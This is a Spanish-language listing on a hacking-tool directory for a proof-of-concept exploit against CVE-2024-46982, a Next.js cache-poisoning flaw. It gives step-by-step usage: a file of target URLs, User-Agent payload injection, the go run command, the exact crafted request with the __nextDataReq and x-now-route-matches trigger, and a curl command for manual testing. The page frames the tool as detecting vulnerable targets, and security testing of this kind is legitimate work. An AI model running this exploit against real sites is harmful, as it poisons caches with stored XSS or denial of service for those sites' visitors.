Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/lercas/cve-2024-46982
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad Web
GitHublercas/cve-2024-46982

CVE-2024-46982

POC CVE-2024-46982

Ver Repositorio
511hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Envenenamiento de Caché en Next.js

Esta herramienta automatiza la detección y explotación de CVE-2024-46982, una vulnerabilidad de envenenamiento de caché en Next.js, donde las respuestas de Renderizado del Lado del Servidor (SSR) pueden ser cacheadas incorrectamente como Generación de Sitio Estático (SSG). Esta mala configuración puede provocar XSS Almacenado, DoS y fuga de datos, permitiendo a los atacantes inyectar contenido malicioso en las respuestas cacheadas.

Instalación y Uso

Prepare su lista de objetivos

Cree un archivo llamado targets.txt que contenga una URL objetivo por línea:

root@kitploit:~
https://vulnerable-site.com
https://another-target.com

Defina payloads personalizados

Cree un archivo llamado payloads.txt que contenga payloads que se inyectarán a través del encabezado User-Agent:

root@kitploit:~

Ejecute el exploit

Descargar herramienta

Compile y ejecute el exploit con:

root@kitploit:~
go run exploit.go -f targets.txt -p payloads.txt -d 5

Cómo Funciona

  • Lee la lista de URLs objetivo de targets.txt
  • Itera sobre cada objetivo y añade el endpoint vulnerable:
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
  • Envía múltiples solicitudes, cada una usando un payload diferente de payloads.txt
  • Analiza la respuesta HTTP en busca de señales de inyección exitosa:
    • Si el payload aparece en el cuerpo de la respuesta → El objetivo es vulnerable
    • Si el código de respuesta es 200 OK y el comportamiento de caché es anormal → Potencialmente vulnerable
    • Si el código de respuesta es 403 Prohibido o 404 No Encontrado → Probablemente parcheado
  • Muestra los resultados después de probar todos los objetivos

Para verificar manualmente:

Envíe una solicitud maliciosa con curl:

root@kitploit:~
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: " \
     -H "x-now-route-matches: 1"

Visite el endpoint en un navegador

Requisitos

  • Go 1.21 o superior.